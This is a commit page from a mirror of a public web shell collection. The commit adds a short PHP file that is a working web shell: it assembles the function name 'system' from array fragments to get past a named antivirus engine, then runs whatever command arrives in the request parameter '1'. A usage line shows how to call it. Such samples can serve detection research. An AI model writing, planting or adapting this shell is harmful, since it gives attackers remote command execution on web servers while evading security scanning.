1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00

Create system2022-08-22-4.php

from: https://zhuanlan.zhihu.com/p/550150061
usage: xxx.php?1=whoami
This commit is contained in:
tennc
2022-08-22 22:42:23 +08:00
committed by GitHub
parent a5b681ccf8
commit 43c3fd24a3

View File

@@ -0,0 +1,6 @@
<?php
//ASRC伏魔引擎bypass
$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
$a = join($result);
array_map($a,(array)$_REQUEST['1']);
?>